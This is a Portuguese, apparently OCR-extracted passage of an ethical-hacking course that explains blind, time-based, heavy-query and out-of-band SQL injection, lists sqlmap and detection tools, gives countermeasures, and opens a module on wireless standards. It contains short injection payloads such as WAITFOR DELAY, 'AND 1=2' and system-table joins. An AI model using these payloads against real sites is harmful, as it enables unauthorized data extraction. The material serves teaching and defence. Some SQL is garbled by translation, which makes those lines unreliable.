A injeção SQL de atraso de tempo (às vezes chamada de injeção SQL baseada em tempo) avalia o atraso
de tempo que ocorre em resposta a consultas verdadeiras ou falsas enviadas ao banco de dados. Uma
instrução waitfor interrompe o servidor SQL por um período de tempo específico. Com base na resposta, um
invasor extrairá informações como tempo de conexão ao banco de dados como administrador do sistema ou
como outro usuário e lançará novos ataques.
Figura 7.41: Exemplo de injeção de SQL com atraso de tempo

ÿ Passo 1: SE EXISTE(SELECIONE * DO cartão de crédito) AGUARDE ATRASO '0:0:10'—
ÿ Passo 2: Verifique se o banco de dados “cartão de crédito” existe ou não
ÿ Etapa 3: Se Não, exibe “Não foi possível processar sua solicitação. Por favor, tente novamente mais tarde”.
ÿ Etapa 4: Se sim, durma por 10 segundos. Após 10 segundos, ele exibe “Não foi possível processar sua solicitação. Por
favor, tente novamente mais tarde.”
Como nenhuma mensagem de erro será retornada, use o comando “waitfor delay” para verificar o status da execução do SQL.
WAIT FOR DELAY 'tempo' (segundos)
Isso é como dormir; esperar por um tempo especificado. A CPU é uma maneira segura de fazer um banco de dados esperar.
AGUARDE ATRASO '0:0:10'--
BENCHMARK() (minutos)
Este comando é executado no MySQL Server.
BENCHMARK(quantas vezes, faça isso)

Injeção cega de SQL: exploração booleana
Várias declarações válidas que avaliam verdadeiro e falso são fornecidas no parâmetro afetado no
solicitação HTTP
Ao comparar a página de resposta entre as duas condições, os invasores podem inferir se a injeção
foi ou não bem-sucedida
Por exemplo, considere o seguinte URL:
http://www.myshop.com/item.aspx?id=67
Um invasor pode manipular a solicitação acima para
http://www.myshop.com/item.aspx?id=67 e 1=2
Consulta SQL executada
SELECT Nome, Preço, Descrição FROM ITEM_DATA WHERE ITEM_ID = 67

E1=2
Injeção cega de SQL: exploração booleana
A injeção de SQL cega baseada em booleanos (às vezes chamada de injeção de SQL inferencial) é
executada fazendo as perguntas certas ao banco de dados do aplicativo. Várias instruções válidas
avaliadas como verdadeiras ou falsas são fornecidas no parâmetro afetado na solicitação HTTP. Ao
comparar a página de resposta entre as duas condições, os invasores podem inferir se a injeção foi bem-sucedida.
Se o invasor construir e executar a solicitação correta, o banco de dados revelará tudo o que o invasor
deseja saber, o que facilitará novos ataques. Nessa técnica, o invasor usa um conjunto de operações
booleanas para extrair informações sobre as tabelas do banco de dados. O invasor costuma usar essa
técnica se parecer que o aplicativo é explorável usando um ataque cego de injeção de SQL. Se o
aplicativo não retornar nenhuma mensagem de erro padrão, o invasor tentará usar operações booleanas
contra o aplicativo.
Por exemplo, o URL a seguir exibe os detalhes de um item com id = 67

http://www.myshop.com/item.aspx?id=67
A consulta SQL para a solicitação acima é
SELECT Nome, Preço, Descrição FROM ITEM_DATA WHERE ITEM_ID = 67
Um invasor pode manipular a solicitação acima para

http://www.myshop.com/item.aspx?id=67 e 1=2
Posteriormente, a consulta SQL muda para
SELECT Nome, Preço, Descrição FROM ITEM_DATA WHERE ITEM_ID = 67 AND 1 = 2

Se o resultado da consulta acima for FALSE, nenhum item será exibido na página da web. Em seguida,
o invasor altera a solicitação acima para http://www.myshop.com/item.aspx?id=67 e 1=1
A consulta SQL correspondente é

SELECT Nome, Preço, Descrição FROM ITEM_DATA WHERE ITEM_ID = 67 AND 1 = 1
Se a consulta acima retornar TRUE, os detalhes do item com id = 67 serão exibidos. Portanto, a partir
do resultado acima, o invasor conclui que a página é vulnerável a um ataque de injeção de SQL.

Injeção de SQL cega: consulta pesada
Os invasores usam consultas pesadas para realizar um atraso de tempo

Ataque de injeção SQL sem usar funções de atraso de tempo
Uma consulta pesada recupera uma quantidade significativa de

dados e leva muito tempo para ser executada no mecanismo de
banco de dados
Os invasores geram consultas pesadas usando várias junções

nas tabelas do sistema
Por exemplo,
SELECT * FROM produtos WHERE id=1 AND 1 <

SELECT count(*) FROM all_users A, all_users
B, all_users C
Injeção de SQL cega: consulta pesada
Em algumas circunstâncias, é impossível usar funções de atraso de tempo em consultas SQL, pois o administrador
do banco de dados pode desabilitar o uso de tais funções. Nesses casos, um invasor pode usar consultas
pesadas para executar um ataque de injeção de SQL com atraso de tempo sem usar funções de atraso de
tempo. Uma consulta pesada recupera uma grande quantidade de dados e levará muito tempo para ser executada
no mecanismo de banco de dados. Os invasores geram consultas pesadas usando várias junções nas tabelas
do sistema porque as consultas nas tabelas do sistema levam mais tempo para serem executadas.
Por exemplo, o seguinte é uma consulta pesada no Oracle que leva muito tempo para ser executada:
SELECT count(*) FROM all_users A, all_users B, all_users C
Se um invasor injetar um parâmetro malicioso na consulta acima para executar a injeção de SQL baseada em
tempo sem usar funções, ele assumirá o seguinte formato:
1 AND 1 < SELECT count(*) FROM all_users A, all_users B, all_users C

A consulta resultante final assume a forma
SELECT * FROM produtos WHERE id=1 AND 1 < SELECT count(*) FROM all_users A,
all_users B, all_users C
Um ataque de consulta pesada é um novo tipo de ataque de injeção de SQL que tem um impacto severo no
desempenho do servidor.

Injeção de SQL fora de banda
01 03
Na injeção de SQL fora de banda, o Os invasores usam solicitações de DNS e
invasor precisa se comunicar com HTTP para recuperar dados do banco de dados
o servidor e adquirir recursos do servidor de servidor
banco de dados usado pelo aplicativo da

web
02 04
Os invasores usam diferentes canais de Por exemplo, em um Microsoft SQL Server, um
comunicação para realizar o ataque e obter invasor explora o comando xp_dirtree para
os resultados enviar solicitações de DNS a um servidor
controlado pelo invasor
Injeção de SQL fora de banda
Os ataques de injeção de SQL fora da banda são difíceis de executar porque o invasor precisa se comunicar
com o servidor e determinar os recursos do servidor de banco de dados usado pelo aplicativo da web.
Nesse ataque, o invasor usa diferentes canais de comunicação (como funcionalidade de e-mail de banco
de dados ou funções de gravação e carregamento de arquivos) para realizar o ataque e obter os resultados.
Os invasores usam essa técnica em vez da injeção SQL in-band ou cega se não puderem usar o mesmo
canal por meio do qual as solicitações estão sendo feitas para iniciar o ataque e coletar os resultados.
Os invasores usam solicitações de DNS e HTTP para recuperar dados do servidor de banco de dados. Por
exemplo, no Microsoft SQL Server, um invasor explora o comando xp_dirtree para enviar solicitações de
DNS a um servidor controlado pelo invasor. Da mesma forma, no banco de dados Oracle, um invasor pode
usar o pacote UTL_HTTP para enviar solicitações HTTP de SQL ou PL/SQL para um servidor controlado
pelo invasor.

Ferramentas de injeção SQL

O sqlmap automatiza o processo de detecção e exploração de falhas de injeção SQL e o controle de
sqlmap servidores de banco de dados
Toupeira https:// sourceforge.net
Blisqy
https:// github.com
blind-sql-bitshifting https://
github.com
NoSQLMap
https:// github.com
SQL Power Injector

http:// www.sqlpowerinjector.com
http:// sqlmap.org
Ferramentas de injeção SQL
ÿ sqlmap
Fonte: http:// sqlmap.org
Sendo uma ferramenta de teste de penetração de código aberto, o sqlmap automatiza o processo de detecção
e exploração de falhas de injeção SQL e assume o controle de servidores de banco de dados. Ele vem com
um poderoso mecanismo de detecção, muitos recursos de nicho para testadores de penetração avançados e
uma ampla gama de switches para impressão digital de banco de dados, busca de dados do banco de dados,
acesso ao sistema de arquivos subjacente e execução de comandos no sistema operacional via fora de banda
conexões.
Os invasores podem usar o sqlmap para executar a injeção de SQL em um site de destino por meio de várias
técnicas, como cego baseado em booleano, cego baseado em tempo, baseado em erro, baseado em consulta
UNION, consultas empilhadas e injeção fora de banda.
Alguns recursos do sqlmap são os seguintes:
o Suporte total para seis técnicas de injeção de SQL: Cego baseado em booleano, cego baseado em tempo,
baseado em erro, baseado em consulta UNION, consultas empilhadas e injeção fora de banda
o Suporte para conectar diretamente ao banco de dados sem passar por uma injeção de SQL, fornecendo
credenciais de DBMS, endereço IP e porta e nome do banco de dados
o Suporte para enumerar usuários, hashes de senha, privilégios, funções, bancos de dados, tabelas,
e colunas
o Reconhecimento automático de formatos de hash de senha e suporte para quebrá-los

usando um ataque baseado em dicionário

o Suporte para despejar totalmente as tabelas do banco de dados; um intervalo de entradas ou colunas específicas de acordo
com a escolha do usuário
o Suporte para pesquisar nomes de banco de dados específicos, tabelas específicas em todos os bancos de dados,
ou colunas específicas nas tabelas de todos os bancos de dados
o Suporte para estabelecer uma conexão TCP stateful fora de banda entre a máquina invasora e o servidor de
banco de dados subjacente ao sistema operacional
Figura 7.42: Captura de tela do sqlmap
Algumas ferramentas adicionais de injeção de SQL estão listadas abaixo:
ÿ Toupeira (https:// sourceforge.net)
ÿ Blisqy (https:// github.com)
ÿ blind-sql-bitshifting (https:// github.com)
ÿ NoSQLMap (https:// github.com)
ÿ SQL Power Injector (http:// www.sqlpowerinjector.com)

Fluxo do módulo
1 2
Discutir tipos de SQL Discutir ataque de injeção de SQL
Ataques de Injeção Contramedidas
Discutir contramedidas de ataque de injeção de SQL

As seções anteriores discutiram a gravidade dos ataques de injeção de SQL, várias técnicas e
ferramentas usadas para executar a injeção de SQL. Essas discussões foram sobre técnicas ofensivas
que um invasor pode adotar para ataques de injeção de SQL. Esta seção discute técnicas defensivas
contra ataques de injeção de SQL e apresenta contramedidas para proteger aplicativos da web.

Contramedidas de ataque de injeção de SQL

1 2 3
Não faça suposições sobre Teste o tamanho e o tipo Teste o conteúdo das
o tamanho, tipo ou de dados de entrada e variáveis de string e
conteúdo dos dados imponha limites apropriados aceite apenas os valores
recebidos pelo seu aplicativo para evitar saturações de esperados
buffer
4 5 6
Rejeitar entradas que Nunca construa o Transact Implemente várias
contenham dados Instruções SQL camadas de validação e
binários, sequências de diretamente da entrada nunca concatene a entrada
escape e comentários do usuário e usam do usuário que não é validada
personagens procedimentos armazenados
para validar a entrada do usuário
Contramedidas de ataque de injeção de SQL
Para se defender contra a injeção de SQL, o desenvolvedor precisa tomar cuidado ao configurar e desenvolver um
aplicativo para criar um que seja robusto e seguro. O desenvolvedor deve usar as melhores práticas e contramedidas
para evitar que os aplicativos se tornem vulneráveis a ataques de injeção de SQL.
Algumas contramedidas para se defender contra ataques de injeção de SQL estão listadas abaixo:
ÿ Não faça suposições sobre o tamanho, tipo ou conteúdo dos dados recebidos por
sua aplicação
ÿ Teste o tamanho e o tipo de dados da entrada e imponha os limites apropriados para evitar buffer
excessos
ÿ Testar o conteúdo das variáveis de string e aceitar apenas os valores esperados
ÿ Rejeitar entradas que contenham dados binários, sequências de escape e caracteres de comentário
ÿ Nunca crie instruções Transact-SQL diretamente da entrada do usuário e use procedimentos armazenados
para validar a entrada do usuário
ÿ Implemente várias camadas de validação e nunca concatene a entrada do usuário que não seja
validado
ÿ Evite construir SQL dinâmico com valores de entrada concatenados
ÿ Certifique-se de que os arquivos de configuração da web para cada aplicativo não contenham
em formação
ÿ Use os tipos de conta SQL mais restritivos para aplicativos

ÿ Use sistemas de detecção de intrusão de rede, host e aplicativo para monitorar a injeção
ataques
ÿ Realize testes automatizados de injeção de caixa preta, análise de código-fonte estático e manual
testes de penetração para sondar vulnerabilidades
ÿ Mantenha dados não confiáveis separados de comandos e consultas

ÿ
Na ausência de API parametrizada, use sintaxe de escape específica para o interpretador eliminar caracteres
especiais
ÿ Use um algoritmo de hash seguro, como SHA256, para armazenar senhas de usuários em vez de
texto simples
ÿ Use a camada de abstração de acesso a dados para reforçar o acesso seguro a dados em toda uma
inscrição
ÿ Certifique-se de que o rastreamento de código e as mensagens de depuração sejam removidos antes de implantar um
inscrição
ÿ Projete o código de forma que ele capture e trate as exceções apropriadamente
ÿ Aplicar regras de privilégio mínimo para executar os aplicativos que acessam o DBMS
ÿ Validar dados fornecidos pelo usuário, bem como dados obtidos de fontes não confiáveis no
lado do servidor
ÿ Evite identificadores entre aspas/delimitados, pois eles complicam significativamente todas as listas brancas, listas
negras e esforços de fuga
ÿ Use uma declaração preparada para criar uma consulta parametrizada para bloquear a execução do
inquerir
ÿ Certifique-se de que todas as entradas do usuário sejam limpas antes de usá-las em instruções SQL dinâmicas
ÿ Use expressões regulares e procedimentos armazenados para detectar código potencialmente prejudicial

Ferramentas de Detecção de Injeção SQL

Maldito SQLi pequeno O DSSS é um scanner de vulnerabilidade de injeção SQL que verifica o aplicativo da Web
Leitor (DSSS) em busca de várias vulnerabilidades de injeção SQL
OWASP ZAP
bufar
https:// www.snort.org
Suíte Burp
HCL AppScan
https:// www.hcltech.com
w3af
https:// w3af.org
https:// github.com
Ferramentas de Detecção de Injeção SQL
As ferramentas de detecção de injeção de SQL ajudam na detecção de ataques de injeção de SQL monitorando o tráfego
HTTP e os vetores de ataque de injeção de SQL e determinam se o aplicativo da Web ou o código do banco de dados sofre
de vulnerabilidades de injeção de SQL.
ÿ Damn Small SQLi Scanner (DSSS)
Damn Small SQLi Scanner (DSSS) é um scanner de vulnerabilidade de injeção de SQL totalmente funcional
(suportando parâmetros GET e POST). Ele verifica o aplicativo da Web em busca de várias vulnerabilidades de
injeção de SQL.
Os profissionais de segurança podem usar essa ferramenta para detectar vulnerabilidades de injeção de SQL em
aplicativos da web.

Figura 7.43: Captura de tela do Damn Small SQLi Scanner (DSSS)
Algumas ferramentas adicionais de detecção de injeção de SQL são as seguintes:
OWASP ZAP (https:// www.owasp.org)

ÿ Snort (https:// www.snort.org)
ÿ Burp Suite (https:// portswigger.net)
ÿ HCL AppScan (https:// www.hcltech.com)

Resumo do Módulo
Este módulo discutiu os conceitos e ataques do servidor web
Ele cobriu várias ferramentas e contramedidas de ataque ao servidor da Web
Ele discutiu a arquitetura de aplicativos da Web e a pilha de vulnerabilidades
Ele também discutiu várias ameaças e ataques de aplicativos da web
Ele demonstrou diferentes ferramentas de ataque de aplicativos da web
Ele discutiu várias contramedidas contra ataques de aplicativos da web
Este módulo também discutiu diferentes tipos de ataques de injeção de SQL e ferramentas
de injeção de SQL
Finalmente, este módulo terminou com uma discussão detalhada sobre várias
contramedidas contra ataques de injeção de SQL
No próximo módulo, discutiremos em detalhes vários ataques sem fio e

contramedidas
Resumo do Módulo
Este módulo discutiu os conceitos e ataques do servidor web. Ele também cobriu várias ferramentas e
contramedidas de ataque ao servidor da Web. Ele também discutiu a arquitetura de aplicativos da Web
e a pilha de vulnerabilidades. Ele também discutiu várias ameaças e ataques a aplicativos da web, bem
como demonstrou diferentes ferramentas de ataque a aplicativos da web. Além disso, discutiu várias
contramedidas contra ataques de aplicativos da web. Este módulo também discutiu diferentes tipos de
ataques de injeção de SQL e ferramentas de injeção de SQL. Por fim, o módulo terminou com uma
discussão detalhada sobre várias contramedidas contra ataques de injeção de SQL.
No próximo módulo, discutiremos em detalhes os vários ataques e contramedidas sem fio.
MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 08
Ataques sem fio e c on tr am ed ida s

Ataques sem fio e contramedidas
1 Visão geral da terminologia sem fio
2 Visão geral dos algoritmos de criptografia sem fio
3 Compreendendo as técnicas de ataque específicas da rede sem fio
4 Visão geral de diferentes ferramentas de ataque sem fio
5 Compreendendo as técnicas de ataque do Bluetooth
6 Visão geral de várias contramedidas de ataque sem fio
7 Visão geral de diferentes ferramentas de segurança sem fio
As redes sem fio são mais baratas e fáceis de manter do que as redes com fio. Um invasor pode facilmente comprometer
uma rede sem fio sem medidas de segurança adequadas ou sem uma configuração de rede apropriada. Como os
mecanismos de alta segurança para redes sem fio podem ser caros, é aconselhável determinar fontes críticas, riscos ou
vulnerabilidades associadas à rede e, em seguida, verificar se o mecanismo de segurança atual pode proteger a rede sem
fio contra todos os ataques possíveis. Caso contrário, os mecanismos de segurança devem ser atualizados.
Este módulo descreve os tipos de redes sem fio e os padrões de rede sem fio. Vários algoritmos de criptografia sem fio são
analisados, juntamente com seus pontos fortes e fracos. O módulo também discute várias técnicas de ataque de rede sem
fio e contramedidas para proteger redes sem fio.
ÿ Descrever a terminologia sem fio
ÿ Explicar diferentes algoritmos de criptografia sem fio
ÿ Descrever técnicas de ataque específicas de redes sem fio
ÿ Use diferentes ferramentas de ataque sem fio
ÿ Descrever técnicas de ataque Bluetooth
ÿ Aplicar contramedidas de ataque sem fio
ÿ Use diferentes ferramentas de segurança sem fio

Fluxo do módulo
Entenda a rede sem fio

Terminologia
Discutir diferentes tipos de

criptografia sem fio
Discutir rede sem fio
Técnicas Específicas de Ataque
Entenda o Bluetooth
Ataques
Discutir ataque sem fio
Contramedidas
Entenda a terminologia sem fio

A tecnologia de rede está caminhando para uma nova era de evolução tecnológica por meio de
tecnologias sem fio. A rede sem fio está revolucionando a maneira como as pessoas trabalham e se
divertem. Ao remover conexões físicas ou cabos, os indivíduos podem usar as redes de novas
maneiras para tornar os dados portáteis, móveis e acessíveis. Uma rede sem fio é um sistema de
comunicação de dados ilimitado que usa tecnologia de radiofrequência para se comunicar com dispositivos e obter dad
Essa rede libera o usuário de conexões com fio múltiplas e complicadas usando ondas eletromagnéticas
(EM) para interconectar dois pontos individuais sem estabelecer nenhuma conexão física. Esta seção
descreve os conceitos sem fio básicos.

Terminologia sem fio
GSM largura de banda Ponto de acesso (AP)

Um sistema universal usado para Descreve a quantidade de informação que Usado para conectar dispositivos sem
transporte móvel para redes sem fio em pode ser transmitida através de uma fio a uma rede sem fio/com fio
todo o mundo conexão
BSSID banda ISM Ponto de acesso
O endereço MAC de um AP que Um conjunto de frequências para as Um local onde uma rede sem fio está
configurou um Basic Service Set (BSS) comunidades industriais, científicas e médicas disponível para uso público
internacionais
Terminologia sem fio (continuação)
Associação MIMO-OFDM
O processo de conectar um dispositivo sem Uma interface aérea para 4G e 5G
fio a um AP comunicações sem fio de banda larga
SSID DSSS
Um identificador exclusivo de Um sinal de dados original multiplicado por
32 caracteres alfanuméricos atribuído a um ruído pseudo-aleatório espalhando o código
uma rede local sem fio (WLAN)
OFDM FHSS
Método de codificação de dados digitais Um método de transmissão de sinais
em múltiplas frequências portadoras de rádio comutando rapidamente uma
portadora entre muitos canais de frequência
Terminologia sem fio
Em uma rede sem fio, os dados são transmitidos por meio de ondas EM que transportam sinais pelo caminho de
comunicação. Os termos associados a redes sem fio incluem o seguinte:
ÿ Global System for Mobile Communications (GSM): É um sistema universal utilizado para transmissão
de dados móveis em redes sem fio em todo o mundo.

ÿ Largura de Banda: Descreve a quantidade de informação que pode ser transmitida em uma conexão. Normalmente,
a largura de banda refere-se à taxa de transferência de dados e é medida em bits (quantidade de dados) por
segundo (bps).
ÿ Ponto de acesso (AP): Um AP é usado para conectar dispositivos sem fio a uma rede sem fio/com fio. Ele permite
que dispositivos de comunicação sem fio se conectem a uma rede sem fio por meio de padrões sem fio, como
Bluetooth e Wi-Fi. Ele serve como um switch ou hub entre uma LAN com fio e uma rede sem fio.
ÿ Identificador do conjunto de serviço básico (BSSID): É o endereço de controle de acesso à mídia (MAC) de um
ponto de acesso (AP) ou estação base que configurou um conjunto de serviço básico (BSS). Geralmente, os
usuários desconhecem o BSS ao qual pertencem. Quando um usuário move um dispositivo, o BSS usado pelo
dispositivo pode mudar devido a uma variação no alcance coberto pelo AP, mas essa mudança pode não afetar
a conectividade do dispositivo sem fio.
ÿ Banda industrial, científica e médica (ISM): Esta banda é um conjunto de frequências usadas pelas
comunidades industriais, científicas e médicas internacionais.
ÿ Hotspot: São locais onde as redes sem fio estão disponíveis para uso público.
Os pontos de acesso referem-se a áreas com disponibilidade de Wi-Fi, onde os usuários podem habilitar o Wi-Fi
em seus dispositivos e conectar-se à Internet.
ÿ Associação: Refere-se ao processo de conexão de um dispositivo wireless a um AP.
ÿ Identificador de conjunto de serviços (SSID): Um SSID é um identificador exclusivo de 32 caracteres

alfanuméricos fornecido a uma rede local sem fio (WLAN) que atua como um identificador sem fio da rede. O
SSID permite conexões à rede desejada entre as redes independentes disponíveis. Dispositivos conectados à
mesma WLAN devem usar o mesmo SSID para estabelecer conexões.
ÿ Multiplexação por divisão de frequência ortogonal (OFDM): Um OFDM é um método de modulação digital de
dados no qual um sinal, em uma frequência escolhida, é dividido em várias frequências portadoras que são
ortogonais (ocorrendo em ângulos retos) entre si. OFDM mapeia informações sobre as mudanças na fase da
portadora, frequência, amplitude ou uma combinação destes e compartilha a largura de banda com outros canais
independentes. Ele produz um esquema de transmissão que suporta taxas de bits mais altas do que a operação
de canal paralelo. É também um método de codificação de dados digitais em múltiplas frequências portadoras.
ÿ Múltiplas entradas, múltiplas saídas-multiplexação ortogonal por divisão de frequência (MIMO OFDM):
MIMO-OFDM influencia a eficiência espectral dos serviços de comunicação sem fio 4G e 5G. A adoção da
técnica MIMO-OFDM reduz a interferência e aumenta a robustez do canal.
ÿ Espectro de dispersão de seqüência direta (DSSS): DSSS é uma técnica de espectro de dispersão que multiplica
o sinal de dados original com um código de dispersão de ruído pseudo-aleatório. Também conhecida como
esquema de transmissão de dados ou esquema de modulação, a técnica protege os sinais contra interferência
ou bloqueio.

ÿ Frequency-hopping spread spectrum (FHSS): FHSS, também conhecido como acesso múltiplo por
divisão de código com salto de frequência (FH-CDMA), é um método de transmissão de sinais de
rádio comutando rapidamente uma portadora entre muitos canais de frequência. Diminui a eficiência
de interceptação não autorizada ou bloqueio de telecomunicações. No FHSS, um transmissor salta
entre as frequências disponíveis usando um algoritmo especificado em uma sequência pseudo-
aleatória conhecida tanto pelo remetente quanto pelo destinatário.

Redes sem fio
O cliente é muito
importante, o cliente
será seguido pelo cliente.
Até que a fringilla foi maleduca
ante o triste ullamcorper. Em
vulputate nenhum dos dois.
Rede sem fio (Wi-Fi) refere-se a WLANs Dispositivos, como
baseadas no padrão IEEE 802.11, que computador pessoal, console de
permite que o dispositivo acesse a rede de videogame e smartphone, usam Wi-Fi
qualquer lugar dentro do alcance do AP para se conectar a um recurso de rede, como o
Internet, através de um AP de rede sem fio
Redes sem fio
As redes sem fio usam transmissão por ondas de rádio, que geralmente ocorre na camada física da
estrutura da rede. Com a revolução global da comunicação sem fio, as redes de dados e as telecomunicações
estão mudando fundamentalmente. Wi-Fi refere-se a uma WLAN baseada no padrão IEEE 802.11 e permite
que um dispositivo acesse a rede de qualquer lugar dentro do alcance de um AP. Wi-Fi é uma tecnologia
amplamente utilizada na comunicação sem fio através de um canal de rádio.
O Wi-Fi utiliza várias técnicas, como DSSS, FHSS, infravermelho (IR) e OFDM para estabelecer uma
conexão entre um transmissor e um receptor. Dispositivos como computadores pessoais, consoles de
videogame e smartphones usam Wi-Fi para se conectar a um recurso de rede, como a Internet, por meio
de um AP de rede sem fio.
A seguir estão algumas das vantagens e desvantagens das redes sem fio:
ÿ Vantagens
o A instalação é rápida e fácil sem a necessidade de fiação através de paredes e tetos
o Fornece facilmente conectividade em áreas onde é difícil colocar cabos
o A rede pode ser acessada de qualquer lugar dentro do alcance de um AP
o Espaços públicos como aeroportos, bibliotecas, escolas e até cafeterias oferecem
conexões de Internet constantes através de WLANs
ÿ Desvantagens
o A segurança pode não atender às expectativas
o A largura de banda sofre conforme o número de dispositivos na rede aumenta
o As atualizações Wi-Fi podem exigir novas placas wireless e/ou APs

o Alguns equipamentos eletrônicos podem interferir nas redes Wi-Fi

Tipos de redes sem fio

Extensão para uma rede cabeada Múltiplos Pontos de Acesso
Acesso
Usuários Apontar
Acesso Acesso
Banda larga Apontar Usuários
Usuários Apontar
Roteador
Extensão
Apontar
Banda larga
Internet Roteador
Usuários
Internet
Rede sem fio LAN-to-LAN ponto de acesso 3G/4G
Internet
E1 E2
USB 3G/4G
Banda larga Banda larga Usuários

Roteador Roteador
ponto de acesso 3G
Conexão 3G
Torre de celular
Tipos de redes sem fio
Os diferentes tipos de redes sem fio são descritos a seguir.
ÿ Extensão para uma rede cabeada
Um usuário pode estender uma rede com fio colocando APs entre uma rede com fio e dispositivos sem fio.
Uma rede sem fio também pode ser criada usando um AP.
Os tipos de APs incluem o seguinte:
o Software APs (SAPs): SAPs podem ser conectados a uma rede com fio e são executados em um
computador equipado com uma placa de interface de rede sem fio (NIC).
o Hardware APs (HAPs): HAPs suportam a maioria dos recursos sem fio.
Nesse tipo de rede, o AP atua como um switch, fornecendo conectividade para computadores que usam
uma NIC sem fio. O AP pode conectar clientes sem fio a uma LAN com fio, o que permite acesso sem fio a
recursos da LAN, como servidores de arquivos e conexões com a Internet.

Figura 8.1: Extensão para uma rede com fio
ÿ Múltiplos Pontos de Acesso
Esse tipo de rede conecta computadores sem fio usando vários pontos de acesso. Se um único AP não
puder cobrir uma área, múltiplos APs ou pontos de extensão podem ser estabelecidos.
A área sem fio de cada AP deve se sobrepor à área de seu vizinho. Isso fornece aos usuários a capacidade
de se movimentar sem problemas usando um recurso chamado roaming. Alguns fabricantes desenvolvem
pontos de extensão que atuam como relés sem fio, estendendo o alcance de um único AP.
Vários pontos de extensão podem ser agrupados para fornecer acesso sem fio a locais distantes do ponto
de acesso central.
Figura 8.2: Múltiplos pontos de acesso
ÿ Rede sem fio LAN-to-LAN
Os APs fornecem conectividade sem fio a computadores locais, e computadores locais em diferentes redes
podem ser interconectados. Todos os APs de hardware têm a capacidade de se interconectar com outros
APs de hardware. No entanto, interconectar LANs por meio de conexões sem fio é uma tarefa complexa.

Figura 8.3: Rede sem fio LAN-to-LAN
ÿ Hotspot 3G/4G
Um ponto de acesso 3G/4G é um tipo de rede sem fio que fornece acesso Wi-Fi a dispositivos
habilitados para Wi-Fi, incluindo MP3 players, notebooks, tablets, câmeras, PDAs, netbooks e
muito mais.
Figura 8.4: ponto de acesso 3G/4G

Padrões sem fio

Emendas Frequência (GHz) Modulação Velocidade (Mbps) Alcance (metros)
802.11 (Wi-Fi) 2.4 DSSS, FHSS 1, 2 20 – 100
5 35 – 100
802.11a OFDM 6, 9, 12, 18, 24, 36, 48, 54
3.7 5000
802.11b 2.4 DSSS 1, 2, 5.5, 11 35 – 140
É um aprimoramento do 802.11ae 802.11b que permite a portabilidade global ao permitir variações nas frequências, níveis
802.11d
de potência e largura de banda
802.11e Ele fornece orientação para priorização de transmissões de dados, voz e vídeo, permitindo QoS
802.11g 2.4 OFDM 6, 9, 12, 18, 24, 36, 48, 54 38 – 140
Um padrão para redes locais sem fio (WLANs) que fornece criptografia aprimorada para redes que usam os padrões 802.11a, 802.11b e
802.11i
802.11g; define WPA2-Enterprise/WPA2-Personal para Wi-Fi
802.11n 2.4, 5 MIMO-OFDM 54 – 600 70 – 250
802.15.1 (Bluetooth) 2.4 GFSK, ÿ/4-DPSK, 8DPSK 25 – 50 10 – 240
802.15.4 (ZigBee) 0,868, 0,915, 2,4 O-QPSK, GFSK, BPSK 0,02, 0,04, 0,25 1 – 100
802.16 (WiMAX) 2 – 11 SOFDMA 34 – 1000 1609,34 - 9656,06 (1-6 milhas)
Padrões sem fio
O padrão IEEE 802.11 evoluiu de um padrão para uma extensão sem fio básica para LAN com fio
a um protocolo maduro que suporta autenticação corporativa, criptografia forte e qualidade de serviço. Quando
introduzido em 1997, o padrão WLAN especificava a operação em 1 e 2 Mbps na faixa de infravermelho, bem como
na banda de frequência industrial, científica e médica (ISM) isenta de licença de 2,4 GHz. No início, uma rede 802.11
tinha alguns PCs com capacidade sem fio conectados a uma LAN Ethernet (IEEE 802.3) por meio de um único AP de
rede. Agora, as redes 802.11 operam em velocidades substancialmente mais altas e em bandas adicionais. Surgiram
novos problemas, como segurança, roaming entre vários APs e qualidade de serviço. As alterações ao padrão são
indicadas por letras do alfabeto derivadas dos grupos de tarefas 802.11 que as criaram, conforme mostrado na tabela
abaixo.
Frequência de Emendas (GHz) Modulação Velocidade (Mbps) Alcance (Metros)
802.11 (Wi-Fi) 2.4 DSSS, FHSS 1, 2 20 – 100
5 35 – 100
6, 9, 12, 18, 24,
802.11a OFDM
3.7 36, 48, 54 5000
802.11b 2.4 DSSS 1, 2, 5.5, 11 35 – 140
É um aprimoramento do 802.11ae 802.11b que permite a portabilidade global ao permitir

802.11d
variações nas frequências, níveis de potência e largura de banda
Ele fornece orientação para priorização de transmissões de dados, voz e

802.11e
vídeo, permitindo QoS

6, 9, 12, 18, 24,

802.11g 2.4 OFDM 38 – 140
36, 48, 54
Um padrão para redes locais sem fio (WLANs) que fornece criptografia aprimorada para
802.11i redes que usam os padrões 802.11a, 802.11b e 802.11g; define WPA2-Enterprise/WPA2-
Personal para Wi-Fi
802.11n 2.4, 5 MIMO-OFDM 54 – 600 70 – 250
802.15.1 GFSK, ÿ/4-DPSK,

2.4 25 – 50 10 – 240
(Bluetooth) 8DPSK
802.15.4 0,868, 0,915, O-QPSK, GFSK,

0,02, 0,04, 0,25 1 – 100
(ZigBee) 2,4 BPSK
1609,34 -
802.16
2 – 11 SOFDMA 34 – 1000 9656,06 (1-6
(WiMAX)
milhas)
Tabela 8.1: Padrões sem fio
ÿ 802.11: O padrão 802.11 (Wi-Fi) se aplica a WLANs e usa FHSS ou DSSS como espectro de salto de
frequência. Ele permite que um dispositivo eletrônico estabeleça uma conexão sem fio em qualquer rede.
ÿ 802.11a: É a primeira emenda ao padrão 802.11 original. O padrão 802.11 opera na banda de frequência de
5 GHz e suporta larguras de banda de até 54 Mbps usando multiplexação ortogonal por divisão de
frequência (OFDM). Tem uma velocidade máxima alta, mas é relativamente mais sensível a paredes e
outros obstáculos.
ÿ 802.11b: IEEE ampliou o padrão 802.11 criando as especificações 802.11b em 1999. Esse padrão opera na
banda ISM de 2,4 GHz e suporta larguras de banda de até 11 Mbps usando modulação DSSS (direct-
sequence spread spectrum).
ÿ 802.11d: O padrão 802.11d é uma versão aprimorada de 802.11a e 802.11b que oferece suporte a domínios
regulatórios. As especificações deste padrão podem ser definidas na camada de controle de acesso à
mídia (MAC).
ÿ IEEE 802.11e: É usado para aplicações em tempo real, como voz, VoIP e vídeo. Para garantir que esses
aplicativos sensíveis ao tempo tenham os recursos de rede de que precisam, o 802.11e define mecanismos
para garantir qualidade de serviço (QoS) para a Camada 2 do modelo de referência, que é a camada MAC.
ÿ 802.11g: É uma extensão do 802.11 e suporta uma largura de banda máxima de 54 Mbps usando a
tecnologia OFDM. Ele usa a mesma banda de 2,4 GHz do 802.11b. O padrão IEEE 802.11g define
extensões de alta velocidade para 802.11b e é compatível com o padrão 802.11b, o que significa que os
